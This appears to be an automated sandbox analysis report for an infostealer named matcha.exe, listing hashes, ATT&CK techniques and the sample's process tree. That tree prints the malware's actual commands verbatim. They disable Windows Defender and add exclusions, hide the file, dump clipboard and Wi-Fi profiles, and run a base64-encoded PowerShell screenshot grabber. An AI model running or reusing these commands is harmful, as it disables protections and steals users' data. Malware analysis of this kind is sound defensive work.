e0051ec0211d9c8090d3a63038d74863094618a8e971ff1efc6ebf939615e8f4

Analysis

max time kernel
92s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-01-2025 19:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

matcha.exe
Size

7.1MB
MD5

0203b66c50fcda6ab03d559641782548
SHA1

cb83ab81c3d4e86b7adad7f114e6186dfd1e6c72
SHA256

e0051ec0211d9c8090d3a63038d74863094618a8e971ff1efc6ebf939615e8f4
SHA512

38f5dd652c4e9317d4dc52bc8e1408974b0bad17cebe9d6fd82661c881d4c82039d45ae42c4b051aa8a5dc781b4ae4adbbcb7bf52b8c486de3bc99191b669bc7
SSDEEP

98304:9DCIfhvpj/q5MD/x/0feyGgatbQ940BDlgwdnpka9R/k9t+2SzIrzUGt+EtMJbF2:9GOpj/bDfyGgqwBdnpkYRMsc8hJpWR19

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2100	powershell.exe
3756	powershell.exe
4160	powershell.exe
2688	powershell.exe
2768	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	matcha.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4504	cmd.exe
4952	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5020	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe
396	matcha.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
27	discord.com
26	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
3404	tasklist.exe
4052	tasklist.exe
3764	tasklist.exe
4648	tasklist.exe
1844	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3668	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4420	cmd.exe
4512	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4084	netsh.exe
1424	cmd.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1516	WMIC.exe
1400	WMIC.exe
2596	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2148	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4512	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2688	powershell.exe
2100	powershell.exe
2100	powershell.exe
2688	powershell.exe
2768	powershell.exe
2768	powershell.exe
4952	powershell.exe
4952	powershell.exe
4952	powershell.exe
1364	powershell.exe
1364	powershell.exe
1364	powershell.exe
3756	powershell.exe
3756	powershell.exe
2188	powershell.exe
2188	powershell.exe
4160	powershell.exe
4160	powershell.exe
4984	powershell.exe
4984	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	468	WMIC.exe
Token: SeSecurityPrivilege	468	WMIC.exe
Token: SeTakeOwnershipPrivilege	468	WMIC.exe
Token: SeLoadDriverPrivilege	468	WMIC.exe
Token: SeSystemProfilePrivilege	468	WMIC.exe
Token: SeSystemtimePrivilege	468	WMIC.exe
Token: SeProfSingleProcessPrivilege	468	WMIC.exe
Token: SeIncBasePriorityPrivilege	468	WMIC.exe
Token: SeCreatePagefilePrivilege	468	WMIC.exe
Token: SeBackupPrivilege	468	WMIC.exe
Token: SeRestorePrivilege	468	WMIC.exe
Token: SeShutdownPrivilege	468	WMIC.exe
Token: SeDebugPrivilege	468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	468	WMIC.exe
Token: SeRemoteShutdownPrivilege	468	WMIC.exe
Token: SeUndockPrivilege	468	WMIC.exe
Token: SeManageVolumePrivilege	468	WMIC.exe
Token: 33	468	WMIC.exe
Token: 34	468	WMIC.exe
Token: 35	468	WMIC.exe
Token: 36	468	WMIC.exe
Token: SeDebugPrivilege	3404	tasklist.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeIncreaseQuotaPrivilege	468	WMIC.exe
Token: SeSecurityPrivilege	468	WMIC.exe
Token: SeTakeOwnershipPrivilege	468	WMIC.exe
Token: SeLoadDriverPrivilege	468	WMIC.exe
Token: SeSystemProfilePrivilege	468	WMIC.exe
Token: SeSystemtimePrivilege	468	WMIC.exe
Token: SeProfSingleProcessPrivilege	468	WMIC.exe
Token: SeIncBasePriorityPrivilege	468	WMIC.exe
Token: SeCreatePagefilePrivilege	468	WMIC.exe
Token: SeBackupPrivilege	468	WMIC.exe
Token: SeRestorePrivilege	468	WMIC.exe
Token: SeShutdownPrivilege	468	WMIC.exe
Token: SeDebugPrivilege	468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	468	WMIC.exe
Token: SeRemoteShutdownPrivilege	468	WMIC.exe
Token: SeUndockPrivilege	468	WMIC.exe
Token: SeManageVolumePrivilege	468	WMIC.exe
Token: 33	468	WMIC.exe
Token: 34	468	WMIC.exe
Token: 35	468	WMIC.exe
Token: 36	468	WMIC.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeIncreaseQuotaPrivilege	1516	WMIC.exe
Token: SeSecurityPrivilege	1516	WMIC.exe
Token: SeTakeOwnershipPrivilege	1516	WMIC.exe
Token: SeLoadDriverPrivilege	1516	WMIC.exe
Token: SeSystemProfilePrivilege	1516	WMIC.exe
Token: SeSystemtimePrivilege	1516	WMIC.exe
Token: SeProfSingleProcessPrivilege	1516	WMIC.exe
Token: SeIncBasePriorityPrivilege	1516	WMIC.exe
Token: SeCreatePagefilePrivilege	1516	WMIC.exe
Token: SeBackupPrivilege	1516	WMIC.exe
Token: SeRestorePrivilege	1516	WMIC.exe
Token: SeShutdownPrivilege	1516	WMIC.exe
Token: SeDebugPrivilege	1516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1516	WMIC.exe
Token: SeRemoteShutdownPrivilege	1516	WMIC.exe
Token: SeUndockPrivilege	1516	WMIC.exe
Token: SeManageVolumePrivilege	1516	WMIC.exe
Token: 33	1516	WMIC.exe
Token: 34	1516	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1760 wrote to memory of 396	1760	matcha.exe	85
PID 1760 wrote to memory of 396	1760	matcha.exe	85
PID 396 wrote to memory of 948	396	matcha.exe	86
PID 396 wrote to memory of 948	396	matcha.exe	86
PID 396 wrote to memory of 1968	396	matcha.exe	87
PID 396 wrote to memory of 1968	396	matcha.exe	87
PID 396 wrote to memory of 4056	396	matcha.exe	90
PID 396 wrote to memory of 4056	396	matcha.exe	90
PID 396 wrote to memory of 4732	396	matcha.exe	92
PID 396 wrote to memory of 4732	396	matcha.exe	92
PID 4056 wrote to memory of 3404	4056	cmd.exe	94
PID 4056 wrote to memory of 3404	4056	cmd.exe	94
PID 1968 wrote to memory of 2100	1968	cmd.exe	95
PID 1968 wrote to memory of 2100	1968	cmd.exe	95
PID 948 wrote to memory of 2688	948	cmd.exe	96
PID 948 wrote to memory of 2688	948	cmd.exe	96
PID 4732 wrote to memory of 468	4732	cmd.exe	97
PID 4732 wrote to memory of 468	4732	cmd.exe	97
PID 396 wrote to memory of 2148	396	matcha.exe	99
PID 396 wrote to memory of 2148	396	matcha.exe	99
PID 2148 wrote to memory of 3728	2148	cmd.exe	101
PID 2148 wrote to memory of 3728	2148	cmd.exe	101
PID 396 wrote to memory of 4084	396	matcha.exe	102
PID 396 wrote to memory of 4084	396	matcha.exe	102
PID 4084 wrote to memory of 4016	4084	cmd.exe	104
PID 4084 wrote to memory of 4016	4084	cmd.exe	104
PID 396 wrote to memory of 4560	396	matcha.exe	105
PID 396 wrote to memory of 4560	396	matcha.exe	105
PID 4560 wrote to memory of 1516	4560	cmd.exe	107
PID 4560 wrote to memory of 1516	4560	cmd.exe	107
PID 396 wrote to memory of 3444	396	matcha.exe	108
PID 396 wrote to memory of 3444	396	matcha.exe	108
PID 3444 wrote to memory of 1400	3444	cmd.exe	110
PID 3444 wrote to memory of 1400	3444	cmd.exe	110
PID 396 wrote to memory of 3668	396	matcha.exe	111
PID 396 wrote to memory of 3668	396	matcha.exe	111
PID 396 wrote to memory of 2224	396	matcha.exe	113
PID 396 wrote to memory of 2224	396	matcha.exe	113
PID 3668 wrote to memory of 4484	3668	cmd.exe	153
PID 3668 wrote to memory of 4484	3668	cmd.exe	153
PID 2224 wrote to memory of 2768	2224	cmd.exe	116
PID 2224 wrote to memory of 2768	2224	cmd.exe	116
PID 396 wrote to memory of 3892	396	matcha.exe	117
PID 396 wrote to memory of 3892	396	matcha.exe	117
PID 396 wrote to memory of 5012	396	matcha.exe	118
PID 396 wrote to memory of 5012	396	matcha.exe	118
PID 5012 wrote to memory of 4052	5012	cmd.exe	121
PID 5012 wrote to memory of 4052	5012	cmd.exe	121
PID 3892 wrote to memory of 3764	3892	cmd.exe	122
PID 3892 wrote to memory of 3764	3892	cmd.exe	122
PID 396 wrote to memory of 436	396	matcha.exe	123
PID 396 wrote to memory of 436	396	matcha.exe	123
PID 396 wrote to memory of 4504	396	matcha.exe	124
PID 396 wrote to memory of 4504	396	matcha.exe	124
PID 396 wrote to memory of 3664	396	matcha.exe	127
PID 396 wrote to memory of 3664	396	matcha.exe	127
PID 396 wrote to memory of 3448	396	matcha.exe	129
PID 396 wrote to memory of 3448	396	matcha.exe	129
PID 436 wrote to memory of 1348	436	cmd.exe	130
PID 436 wrote to memory of 1348	436	cmd.exe	130
PID 396 wrote to memory of 1424	396	matcha.exe	132
PID 396 wrote to memory of 1424	396	matcha.exe	132
PID 3664 wrote to memory of 4648	3664	cmd.exe	133
PID 3664 wrote to memory of 4648	3664	cmd.exe	133

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4484	attrib.exe
2960	attrib.exe
3124	attrib.exe

C:\Users\Admin\AppData\Local\Temp\matcha.exe
"C:\Users\Admin\AppData\Local\Temp\matcha.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1760
- C:\Users\Admin\AppData\Local\Temp\matcha.exe
  "C:\Users\Admin\AppData\Local\Temp\matcha.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\matcha.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\matcha.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4056
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4732
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2148
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4084
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4560
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\matcha.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3668
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\matcha.exe"
      4⤵
      Views/modifies file attributes
      PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3892
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5012
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3664
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3448
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1424
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:832
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3780
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:2272
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwA